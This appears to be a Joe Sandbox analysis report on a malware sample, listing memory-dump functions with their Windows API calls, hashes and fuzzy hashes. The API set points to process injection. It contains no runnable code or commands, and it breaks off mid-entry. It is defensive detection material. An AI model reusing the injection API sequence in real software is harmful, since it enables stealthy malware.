Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9880d1ef16d09e76d38d8a384b002da987da29519a3e6918a0a635b3a72341d1
Instruction ID: d11579472ddcc4e2628337492933e4a9d3b9fa736fe301c856959a55a211b838
Opcode Fuzzy Hash: 9880d1ef16d09e76d38d8a384b002da987da29519a3e6918a0a635b3a72341d1
Instruction Fuzzy Hash: 1221E5B5900309EFDB10CF9AD984AEEBFF8FB48320F14842AE914A3210D374A944DF65

Function 07295820 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072958A6

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8c15ba3c1709bc05f7d40acb34b2656678a800983d9f01e3a33d8252247d26cd
Instruction ID: 26da8dfb7ff021f1698ba0ea0e9f3cbc4835f7d72f9f701d238964c01b7742f4
Opcode Fuzzy Hash: 8c15ba3c1709bc05f7d40acb34b2656678a800983d9f01e3a33d8252247d26cd
Instruction Fuzzy Hash: C9213CB6D102098FDB10DFAAC9857EEBBF5EF88310F14842AD419A7240CB789945CFA1

Function 07295AA9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07295B30

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8b32d04e22bd6ca393b552aee79f0b040bc0f67319969e79abb2dee8cde029e9
Instruction ID: 85a1115bdc541537b933861755c72ad36f08d42f4b930a69855275e450fca455
Opcode Fuzzy Hash: 8b32d04e22bd6ca393b552aee79f0b040bc0f67319969e79abb2dee8cde029e9
Instruction Fuzzy Hash: 6C2148B6D002499FDB10CFAAC884AEEFBF5FF48310F14842AE518A7240C7389904DB60

Function 07295AB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07295B30

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5f46581965e0eae857be5c24f0ad8704bfc43bccbb4997195611d7d79c72f3d8
Instruction ID: f2071dd9cdaae4bdaa4ea4ff7f464da03de31d20d6cf20ea73aae7b71be735e4
Opcode Fuzzy Hash: 5f46581965e0eae857be5c24f0ad8704bfc43bccbb4997195611d7d79c72f3d8
Instruction Fuzzy Hash: F82139B1D003599FDB10DFAAC885AEEFBF5FF48310F54842AE518A7240C7389944DBA1

Function 07295828 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072958A6

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: dce2dd309265529f7f2423717db651538b2dbce98d0d2eccf67c61acbfd639eb
Instruction ID: 4ac5743bb561e3fe4848b291a865e35c4527efdaed755f5a5c44eb03e7e3f95f
Opcode Fuzzy Hash: dce2dd309265529f7f2423717db651538b2dbce98d0d2eccf67c61acbfd639eb
Instruction Fuzzy Hash: 7B2137B1D102098FDB10DFAAC8857AEFBF4EF88320F54842AD519A7241CB789945CFA1

Function 00A1D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D84F

Memory Dump Source

Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ce648f2b69df3a8db97e04ecf40330a264c02b0448e30b3359b964b4f5705985
Instruction ID: d5d21f85b058c75c9a764ac21f34a8d05b18e3af4bef4e6300f53918e4466007
Opcode Fuzzy Hash: ce648f2b69df3a8db97e04ecf40330a264c02b0448e30b3359b964b4f5705985
Instruction Fuzzy Hash: 6F21C4B59002499FDB10CF9AD984ADEBBF9FB48320F14841AE918A3350D374A944DF65

Function 072958F8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0729596E

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b3ae1ac3c0d24d7062ac03a5a5429462c84638520304e4b0ef00cc790de77088
Instruction ID: 3f38c63534daf40f151c9e8d9c21e0995e7acdc380e15c5b395c554f9f107520
Opcode Fuzzy Hash: b3ae1ac3c0d24d7062ac03a5a5429462c84638520304e4b0ef00cc790de77088
Instruction Fuzzy Hash: 051159769002499FDF11DFAAC844AEEBFF5EF88324F14881AE519A7250CB359944CFA1

Function 07295770 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 072957DA

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f084015a6a148b67d32661aaecd6d7488b823628ccfb1eef6cac62fbdf9c6b7f
Instruction ID: a52c0db78ce9add3893910071b211d3e02e9f3cd1bfd1c8fd278ada89ba22e4c
Opcode Fuzzy Hash: f084015a6a148b67d32661aaecd6d7488b823628ccfb1eef6cac62fbdf9c6b7f
Instruction Fuzzy Hash: 3B1160B59002498FDB20DFAAC8857EEFBF5EF88324F14841AD419B7240CB399944CF95

Function 07295900 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0729596E

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fe9f75ba51f6648a278e662313943c4659a96430717cbbd06d6423f85b2d007e
Instruction ID: c03e216a484ce4ae8168821ddf962237a5f008b3091b2860553aaf0d96b2b3c9
Opcode Fuzzy Hash: fe9f75ba51f6648a278e662313943c4659a96430717cbbd06d6423f85b2d007e
Instruction Fuzzy Hash: E9116A729002499FDF10DFAAC844ADEFFF5EF48324F148419E519A7250CB359940CFA1

Function 07295778 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 072957DA

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 29434bfac49d8e5390c90d0a287111c325c3793257f9089d7b131d277f815ab0
Instruction ID: f245d019769ba74c35cb2419db784b1c2ead49b5fcfd6042a52b40e5194ffdcc
Opcode Fuzzy Hash: 29434bfac49d8e5390c90d0a287111c325c3793257f9089d7b131d277f815ab0
Instruction Fuzzy Hash: 1C113DB59003498FDB20DFAAC4457DEFBF9EF88324F148429D519A7240CB75A944CB95

Function 00A1B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A1B566

Memory Dump Source

Source File: 0000000B.00000002.2362027743.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a10000_UDYiGmDlq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d614c8e35f36d9995e6f5d0977604ee0bea2acadc74a5f63b8048fc72442f63c
Instruction ID: 09fdda3ca9d3f9ce7af17fd5ebec917eb88fede729f5b651f75ea3bda245a450
Opcode Fuzzy Hash: d614c8e35f36d9995e6f5d0977604ee0bea2acadc74a5f63b8048fc72442f63c
Instruction Fuzzy Hash: D111D2B6C002498FDB10DF9AC544ADEFBF5EB88320F14841AD519B7210D375A545CFA1

Function 072926B0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 072990CD

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a0b5b950920c1a75b15c45255b631d269c69da020450d438ea4a974c3df549fc
Instruction ID: b3700a627ea6c1dfac041b0c2d5e12be287889bbf1eb50347b7442df346c6105
Opcode Fuzzy Hash: a0b5b950920c1a75b15c45255b631d269c69da020450d438ea4a974c3df549fc
Instruction Fuzzy Hash: 551106B5814349DFDB20DF99C849BDEBBF8EB48320F148419E564A7200C375A984CFA1

Function 0729906A Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 072990CD

Memory Dump Source

Source File: 0000000B.00000002.2373222550.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7290000_UDYiGmDlq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9e25a1b419f12a4d3de1186fdd8a17094dfe6a73a29a2eab4ab5f6fbdb560f75
Instruction ID: d180c33584e2201fe928f1da2ba6ffb2d394e39b451ee770837c630fb279a22f
Opcode Fuzzy Hash: 9e25a1b419f12a4d3de1186fdd8a17094dfe6a73a29a2eab4ab5f6fbdb560f75
Instruction Fuzzy Hash: D61106B58003499FDB20DF99D845BDEBFF8EB48320F14845AE558A7201C375A984CFA1

Function 07192D98 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

(gq, xrefs: 07192F35

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: (gq
API String ID: 0-1972435379
Opcode ID: e8f68b75a18a263ab5d646d436cb48c34d2e5b328517515c2cbd2e06ccac357b
Instruction ID: 8716d52c464d719e8af9b84cf8df50f87c84d8ffa2b05df7a31f48a09cb3ff2a
Opcode Fuzzy Hash: e8f68b75a18a263ab5d646d436cb48c34d2e5b328517515c2cbd2e06ccac357b
Instruction Fuzzy Hash: 9871C4B1600306AFDB26DB69D854BAEBBE6FFC4310F148429E406972D1DF349D82CB91

Function 07198E68 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

$cq, xrefs: 07198E7F

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: 7f3e1408ee4e029e766552707cbf73c3fb921a5e2cdcb42e6f8324c299b3e0ef
Instruction ID: 384ab078c0779c457c4c9f14b7d0bc15522b279e32baf3367d4d7733a1cec6e2
Opcode Fuzzy Hash: 7f3e1408ee4e029e766552707cbf73c3fb921a5e2cdcb42e6f8324c299b3e0ef
Instruction Fuzzy Hash: 5211B4B192D280DFCF25A76494306657FA59B43114F1684FBD44AEA1C2D73E8843C3A7

Function 0719ED18 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

Tecq, xrefs: 0719EEA1

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: Tecq
API String ID: 0-1122318316
Opcode ID: 0bb1835d6ea783331e8b2966cb48550c64fd7e2943e8c30a8cc25bf51cc7fda9
Instruction ID: e20ab3c33583c7c78625afc25e9d2bd9b4e1f6c0ba529b2e1ac658d0709a67b3
Opcode Fuzzy Hash: 0bb1835d6ea783331e8b2966cb48550c64fd7e2943e8c30a8cc25bf51cc7fda9
Instruction Fuzzy Hash: FF21EAB0D046088BDB18DFEAC9046DEFBF6BF89300F14C02AD419AB394EB741906CB90

Function 071982C1 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

$cq, xrefs: 071982E6

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: f5b1da7cc59dba7934790252c3c0dc6dec8e5ba52f70fb49e08fe1cf188d04db
Instruction ID: 8540bd65c8aa278aa02e6014a0750edbcc032aec4a7eb12ed15aba89a1da6329
Opcode Fuzzy Hash: f5b1da7cc59dba7934790252c3c0dc6dec8e5ba52f70fb49e08fe1cf188d04db
Instruction Fuzzy Hash: 280181F0519642DFCB198B24D8102A0BBA1BB03244F4682F7D54ACB6C2C774D983C7AA

Function 07196D20 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

G, xrefs: 07196D34

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: db8b42d74183778418f5b6d5f4b964c26668115bd0cc672d88ef2b6b6d040662
Instruction ID: 1b7bee8c1d6b130011fa17af891e5a7eae606ee209f621985923e07d7f64c32e
Opcode Fuzzy Hash: db8b42d74183778418f5b6d5f4b964c26668115bd0cc672d88ef2b6b6d040662
Instruction Fuzzy Hash: 35E017B100D2C89FC7468B7089656A8BFB88F07614F1A05D2D8D986182DB2A1F268762

Function 07196D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

G, xrefs: 07196D34

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 65ef5b16f190355ce959817f95ceb0dca4e99f036a0acd825a20a7bbb7515e3e
Instruction ID: 8460f413b2bf420580672e06017673eb75f54494860a749a8bcfaaabce6cda07
Opcode Fuzzy Hash: 65ef5b16f190355ce959817f95ceb0dca4e99f036a0acd825a20a7bbb7515e3e
Instruction Fuzzy Hash: F9C012F0408108EBCA08DF80D906A6CB7EC9702214F0201A4D80E42280CB795F209AA2

Function 07193478 Relevance: .5, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4fb75545ccd15a82dcbe39641062d633673ef4dad1f9f04b3effe0b263e986
Instruction ID: 569826dde011c481de4aa41f5360e1704b6ea07ba4894cf9a5af3f8a9baa1b7a
Opcode Fuzzy Hash: 7b4fb75545ccd15a82dcbe39641062d633673ef4dad1f9f04b3effe0b263e986
Instruction Fuzzy Hash: E4E19DF0B00206DFDF1AAB68C4486AEBFB2EF45200F5544B9D456A72E5E731CC66CB91

Function 07190480 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1588cd5477c4ba39a76e3346beb60b8cb0889cb6eb746a2fcd0cbddeb2c920
Instruction ID: 0d0ea3282391acb70df290580bf8a787b44fc01c32ca73783e03c00830bb01fa
Opcode Fuzzy Hash: 8f1588cd5477c4ba39a76e3346beb60b8cb0889cb6eb746a2fcd0cbddeb2c920
Instruction Fuzzy Hash: 0AF1B971D1061ACBCF10DFA4C8546EDB7B5FF89300F1086A9E559B7254EB70AA85CF90

Function 07190471 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b8db43dfbb08b9246cf48984326912b10a54c8aa14bad8bc6439bf78ffd26aa
Instruction ID: fd12bfe845c522629c7007726cc946f720a19776ecf6e9d9524d3e10eb48ed58
Opcode Fuzzy Hash: 5b8db43dfbb08b9246cf48984326912b10a54c8aa14bad8bc6439bf78ffd26aa
Instruction Fuzzy Hash: E2E1C771D1061ACBCF10DFA8C8546EDB7B5FF89300F1186A9E849B7254EB70AA85CF90

Function 07194AA1 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9293f044627253ed19b33b5eb7dbcf9beabcdc8566557a02483e0421fdba1fa0
Instruction ID: 9c6441f431ad6dd1516f32fb674fc63deb0f6c2de892ef58cf4cd4b92fe151b6
Opcode Fuzzy Hash: 9293f044627253ed19b33b5eb7dbcf9beabcdc8566557a02483e0421fdba1fa0
Instruction Fuzzy Hash: C9B1E775910619CFDB10EF68C840AD9FBB1FF49314F05C2A9D949BB255EB30AA89CF80

Function 0719778F Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dfb8aa060ed82d99748fe6a5d8bdc6215c06dc48cca482270c59214c07eb0e0
Instruction ID: 6322a3f6618f69667d766f3751d528298d89cc5840f41620fc9490008a25407e
Opcode Fuzzy Hash: 0dfb8aa060ed82d99748fe6a5d8bdc6215c06dc48cca482270c59214c07eb0e0
Instruction Fuzzy Hash: B671BF34A042449FD701AB64D455AAEBBB2EF89300F4489A9D8859F3D7CB346E8AC7D1

Function 071977C8 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16b814ba326f54c41122d82bc0d9dcf80a6553a83dfe3a8a68966824822c23d
Instruction ID: 4ec96580ee514701cc679b22f21fe70c5fa7cb8e6d1ed1021f39ad2a8eb1defa
Opcode Fuzzy Hash: d16b814ba326f54c41122d82bc0d9dcf80a6553a83dfe3a8a68966824822c23d
Instruction Fuzzy Hash: 0861A134B002059FD700AF64D455AAEB7A2FF88300F5489A9E8855F3C6CF716E86CBC1

Function 07190C38 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a77939b0115767fca53f73cb02e8f1896d332a11ad651ec92716ec6cd4efcae8
Instruction ID: 6bbb8d6222534cd69e6f53798d91c9532f596c52df6ffa8c797cb3c6ded98ef3
Opcode Fuzzy Hash: a77939b0115767fca53f73cb02e8f1896d332a11ad651ec92716ec6cd4efcae8
Instruction Fuzzy Hash: 5751F875A1060ACFCF05EFA8C8949ADF7B5FF89310B118669E416B7354EB30E985CB90

Function 07191800 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7e04399d50813869907351c8813e432c4471e10b1937fbda8f1e3fe35ec315
Instruction ID: b278e791236c564826219d754536b4a58127974e6de64f6e55b06d20d33ea508
Opcode Fuzzy Hash: ae7e04399d50813869907351c8813e432c4471e10b1937fbda8f1e3fe35ec315
Instruction Fuzzy Hash: 6241AFB0A1020AEBDF19DF68D405A6EB7B2FF85311F144179D406E72C0CB34D882DB92

Function 07190E40 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e9111d2bbd4eb00f5ce33b14550f21941207abb9005fd436053bdcdd2963f22
Instruction ID: 826bf2a21a1dcca47d12189b75d746f15c2d9a735cf83b675c5f86c2e0309a48
Opcode Fuzzy Hash: 8e9111d2bbd4eb00f5ce33b14550f21941207abb9005fd436053bdcdd2963f22
Instruction Fuzzy Hash: 62519471E10609CFCB00EFA8D8849EDF7B5FF89310F01856AE505AB365EB31A945CB91

Function 07190C2B Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c126641c67800a6ed6552fb642d0afe76232b23956a8466674e49521f3295549
Instruction ID: 6fbe7fdc6f69055ae02bbea798ebfd69ade7e3f46ff4ed45bb28b1e6d4667594
Opcode Fuzzy Hash: c126641c67800a6ed6552fb642d0afe76232b23956a8466674e49521f3295549
Instruction Fuzzy Hash: 9E414D70A1060ACFCF11DF64C8905ADFBB1FF89310B158669E456AB355EB34E985CB90

Function 07197A46 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 616a8c568dfc2714da42b74cd7ecb5b24ef3a88481a22df200f9c29c86409755
Instruction ID: 6c86fb7508a07f73a4ce7640c6e7edcae7298aa8d960233817c826c05a8eb2e6
Opcode Fuzzy Hash: 616a8c568dfc2714da42b74cd7ecb5b24ef3a88481a22df200f9c29c86409755
Instruction Fuzzy Hash: F341A9B062D2918FCF095B74982926EBFF1AF97611F1645A6D043C72C2CB3C5E4287A2

Function 07191198 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b81afb3540b3b877135938b2b207d9eac2c1e5b839f11d51810a000e0c7b6901
Instruction ID: ad34f39f68ed038d3362935308acb955bf81760f5e82df836bc6b8a9663bcf4c
Opcode Fuzzy Hash: b81afb3540b3b877135938b2b207d9eac2c1e5b839f11d51810a000e0c7b6901
Instruction Fuzzy Hash: 803172B1E1021AEFDF19AFA8D84459DBBB6FF89310F10827AE411A7390DB709841CB91

Function 07196B3C Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef111bd05267800716ae2de5272f2d90f6eb86d6203895832f14b9469553a860
Instruction ID: 1843bb533ba8c97ac46dcbb7f589154d8f4133c56e800fbc3d8ea37c73f4feb5
Opcode Fuzzy Hash: ef111bd05267800716ae2de5272f2d90f6eb86d6203895832f14b9469553a860
Instruction Fuzzy Hash: EC31E5F0618104CFDB04DF58D4556AA77B1EB86324F55C47AE01AAB3C1DB39AD438BA1

Function 071917E0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beba51c5431a3db50647d5fa546d15413e67a3bf1d2611ac2a4560d62eed9c53
Instruction ID: 8edcb00b32eef4fb9d0d6b5d22ba9487f56ebcc1153bcf979575239ed49f309a
Opcode Fuzzy Hash: beba51c5431a3db50647d5fa546d15413e67a3bf1d2611ac2a4560d62eed9c53
Instruction Fuzzy Hash: 8431D4B461530BAFDF1A8B64C815A69BBB6AF45311F244179D402D73D1CB34C981EB52

Function 0719A2E0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e8f2bfc6341c51c7b71d60f534e40a1761847569be695af386c828ac77d8fdd
Instruction ID: 2dd4206dfc2205283750b44ef73d9f25172b0036e5f46c6cda1ee0cb98f4b936
Opcode Fuzzy Hash: 7e8f2bfc6341c51c7b71d60f534e40a1761847569be695af386c828ac77d8fdd
Instruction Fuzzy Hash: D93167B29002499FCF10DFA9D884ADEBFF9EF48310F10846AE818A7350D734A945CFA0

Function 07192D88 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 778ae0e842743fd5a36ad64d79d54f7793bdbb4f91bef0c442a2f243ee1aa5e9
Instruction ID: 97c395479c5bd8f289392cc238208d47fa4416935f1f4e0a834bb3f0d8eb77fe
